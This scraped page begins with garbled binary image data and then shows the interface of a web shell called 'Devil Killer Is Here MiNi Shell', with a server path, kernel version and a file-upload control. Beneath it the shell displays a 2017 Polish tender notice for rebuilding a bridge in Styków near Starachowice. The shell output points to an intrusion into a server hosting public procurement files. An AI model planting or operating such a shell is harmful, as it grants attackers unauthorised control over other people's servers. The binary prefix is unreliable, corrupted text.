JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170412/65068-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.starachowice-zdp.pl' target='_blank'>http://www.starachowice-zdp.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 65068 - 2017
              z dnia 2017-04-12 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Starachowice: Przebudowa mostu na rzece Kamiennej w m. Styków w ciągu drogi powiatowej nr 0613T Starachowice  Adamów  Styków  Jabłonna  Dąbrowa - Pawłów.

<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Zarząd Dróg Powiatowych w Starachowicach, krajowy numer identyfikacyjny
              29101963700000, ul.
              ul. Ostrowiecka 
              15,
              27200  
              Starachowice, woj.
              świętokrzyskie, państwo
              Polska, tel.
              (041) 273 19 72-73, e-mail
              zamowienia@zdp-starachowice.pl, faks
              (041) 273 19 74.
              <br />
              Adres strony internetowej (URL): www.zdp-starachowice.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.starachowice-zdp.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.starachowice-zdp.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty nalezy złożyć w siedzibie ZDP<br />
                Adres:
                <br />ul. Ostrowiecka 15, 27-200 Starachowice</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Przebudowa mostu na rzece Kamiennej w m. Styków w ciągu drogi powiatowej nr 0613T Starachowice  Adamów  Styków  Jabłonna  Dąbrowa - Pawłów.

<br /><b>Numer referencyjny: </b>ZP.2510.10.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zamówienie obejmuje:

a. przebudowę mostu na rzece Kamiennej w ciągu drogi powiatowej nr 0613T Starachowice  
    Adamów  Styków  Jabłonna  Dąbrowa - Pawłów w m. Styków
 Zakres planowanej przebudowy polegał będzie na:
	rozbiórce konstrukcji nawierzchni na moście;
	rozbiórce krawężników;
	rozbiórce kap chodnikowych;
	rozbiórce balustrad;
	rozbiórce belek podporęczowych płyty pomostu i skrzydełek;
	rozbiórce izolacji płyty pomostu;
	wykonaniu żelbetowej płyty nadbetonu zespolonej z istniejącą płytą oraz kap chodnikowych;
	wykonaniu izolacji termozgrzewalnej;
	wykonaniu płyt przejściowych;
	wykonaniu urządzeń dylatacyjnych;
	ustawieniu krawężników kamiennych kotwionych do kap chodnikowych;
	montażu polimerobetonowych desek gzymsowych;
	wykonaniu izolacjo-nawierzchni kap chodnikowych;
	zamocowaniu bezprzekładkowych barieroporęczy ochronnych wysokości 1,10 m; 
	wykonaniu warstw nawierzchniowych na moście;
	poszerzeniu korpusu ziemnego drogi w obrębie dojazdów do mostu;
	wykonaniu warstw podbudowy nawierzchni i warstw nawierzchniowych na dojazdach do mostu;
	naprawach betonu konstrukcji podpór i ustroju niosącego;
	zabezpieczeniu antykorozyjnym powierzchni betonu podpór i ustroju niosącego;
	wykonaniu izolacji w miejscach kontaktu betonu z gruntem;
	wymianie rury osłonowej kablowej linii telekomunikacyjnej zabudowanej w kapie chodnikowej mostu na nowy.

b. dojazdy do mostu 
- odcinek od drogi krajowej nr 42 do mostu
- odcinek od mostu do skrzyżowania z drogą powiatową nr 0616T 
<br /><br /><b>II.5) Główny kod CPV: </b>45221111-3<br /><b> Dodatkowe kody CPV:</b>45233220-7,
                45233223-8,
                45233253-7,
                45232451-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/10/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                                       Warunek zostanie spełniony:
                       
   a)    jeżeli wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu
          składania  ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym 
          okresie,  zrealizował    (zakończył) 
                    co najmniej 1 zadanie -  jedną  robotę  budowlaną polegającą  na 
                  przebudowie , rozbudowie,  budowie , odbudowie itp. mostu  o wartości   
                   minimum 2 000 000,00  zł.  

                    b)   wykonawca  wykaże, że dysponuje lub będzie dysponował  osobami  które będą 
                          uczestniczyć w wykonaniu zamówienia  ( osoby skierowane przez wykonawcę 
                           do realizacji zamówienia) legitymujące się kwalifikacjami zawodowymi, 
                          doświadczeniem i wykształceniem odpowiednimi do funkcji jakie  zostaną im 
                          powierzone:
                     
                    Kierownik budowy  1 osoba musi posiadać uprawnienia  budowlane 
                      wymagane przepisami prawa do pełnienia samodzielnej funkcji technicznej 
                      w zakresie kierowania robotami budowlanymi , specjalność mostowa lub 
                      odpowiadające  im ważne uprawnienia  budowlane wydane na  podstawie 
                      wcześniej obowiązujących  przepisów  . (podstawa prawna Ustawa z dnia  7 lipca
                      1994 r. Prawo budowlane.
                     Kierownik robót drogowych  1 osoba musi posiadać uprawnienia  budowlane 
                      wymagane przepisami prawa do pełnienia samodzielnej funkcji technicznej 
                      w zakresie kierowania robotami budowlanymi , specjalność drogowa lub 
                      odpowiadające  im ważne uprawnienia  budowlane wydane na  podstawie 
                      wcześniej obowiązujących  przepisów  . (podstawa prawna Ustawa z dnia  7 lipca
                      1994 r. Prawo budowlane 

Wykonawca może wykazać na stanowisko kierownika budowy, kierownika robót drogowych osoby będące obywatelami państwa członkowskiego, których odpowiednie kwalifikacje zawodowe  zostały uznane na zasadach określonych w przepisach odrębnych (m.in. w ustawie z dnia 22.12.2015r.  Dz. U. z 2016r poz.65 o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Potwierdzających brak podstaw  do wykluczenia:

         a. odpisu z właściwego rejestru lub z centrali ewidencji i informacji  o działalności 
              gospodarczej , jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji , 
              w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust.5 pkt.1 
              ustawy Pzp.

        b. jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
             Rzeczypospolitej Polskiej zamiast dokumentów o których mowa powyżej składa 
             dokument lub dokumenty wystawione w kraju , w którym wykonawca ma siedzibę lub
             miejsce zamieszkania , potwierdzające , że nie otwarto jego likwidacji ani nie ogłoszono 
             upadłości.  
              Dokument te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem 
              terminu składania ofert.
             Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce 
             zamieszkania ma osoba, której dokument dotyczy , nie wydaje się dokumentów , 
             o których mowa powyżej , zastępuje się je dokumentem zawierającym odpowiednio 
             oświadczenie wykonawcy , ze wskazaniem osoby albo osób uprawnionych do jego 
             reprezentacji , lub oświadczenie osoby , której dokument miał dotyczyć , złożone przed 
             notariuszem lub przed organem sadowym , administracyjnym albo organem samorządu 
             zawodowego lub gospodarczego właściwym ze względu na miejsce zamieszkania tej 
             osoby. Przepis dotyczący terminu wystawienia dokumentu stosuje się odpowiednio (nie 
             wcześniej niż 6 miesięcy przed upływem terminu składania ofert).

       c. Każdy wykonawca występujący wspólnie oddzielnie składa dokumenty lub 
             oświadczenia  wymienione w pkt. a i b.

       d.  Wykonawca , który polega na zdolnościach innych podmiotów na zasadach określonych 
            w art. 22a ustawy Pzp zobowiązany jest złożyć  w odniesieniu do tych podmiotów 
            dokumenty wymienione w pkt. a i b. 
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Potwierdzających spełnianie warunków udziału w postępowaniu.

         a. Wykaz robót budowlanych  wykonanych nie wcześniej niż w okresie ostatnich 5 lat
             przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
             krótszy  w tym okresie, wraz  z podaniem ich rodzaju, wartości,  daty, miejsca 
             wykonania i podmiotów, na rzecz których  roboty te  zostały wykonane z  załączeniem
            dowodów określających czy te roboty budowlane  zostały wykonane należycie, 
            w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami 
            prawa budowlanego i prawidłowo ukończone, przy czym dowodami , o których mowa są 
            referencje   bądź  inne dokumenty wystawione przez podmiot, na rzecz którego roboty 
            budowlane były wykonywane a jeżeli z uzasadnionej przyczyny  o obiektywnym  
             charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  - inne 
            dokumenty.

         b. Wykaz osób  skierowanych przez wykonawcę do realizacji zamówienia
             publicznego,  w szczególności odpowiedzialnych za świadczenie usług, kontrolę 
               jakości  lub kierowanie  robotami budowlanymi , wraz z informacja na temat ich 
              kwalifikacji   zawodowych, uprawnień doświadczenia i wykształcenia niezbędnych do 
              wykonania zamówienia  publicznego, a także zakresu wykonywanych przez nie 
              czynności oraz informacją  o podstawie dysponowania tymi osobami. 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca, który w celu potwierdzenia spełniania warunków udziału w postępowaniu 
        polega na zdolnościach innych podmiotów, musi udowodnić zamawiającemu, że realizując
        zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów , w szczególności 
        przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych 
        zasobów na potrzeby realizacji zamówienia, które określają:
       - zakres dostępnych wykonawcy zasobów innego podmiotu i sposobu ich wykorzystania 
         przez wykonawcę przy wykonaniu zamówienia, zakresu i okresu udziału innego podmiotu 
         przy wykonaniu zamówienia.
      - czy podmiot na zdolnościach którego wykonawca polega w odniesieniu do warunków 
         dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia zrealizuje roboty 
        budowlane    których wskazane zdolności dotyczą.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />13.1	Przed upływem terminu składania ofert  należy wnieść wadium w wysokości:
45 000,00 zł    słownie złotych: czterdzieści pięć tysięcy  00/100.

  Wadium może być wnoszone w jednej lub kilku następujących formach:
              a. pieniądzu
              b. poręczeniach bankowych  lub poręczeniach  spółdzielczej kasy  oszczędnościowo- 
                  kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
              c. gwarancjach bankowych
              d. gwarancjach ubezpieczeniowych
              e. poręczeniach udzielanych przez podmioty , o których mowa w art. 6b, ust.5 pkt.2
                  ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju
                  Przedsiębiorczości  (Dz.U.z 2014r  poz. 1804 oraz z 2015r poz.978i1240)

</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>okres gwarancji i rękojmi</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
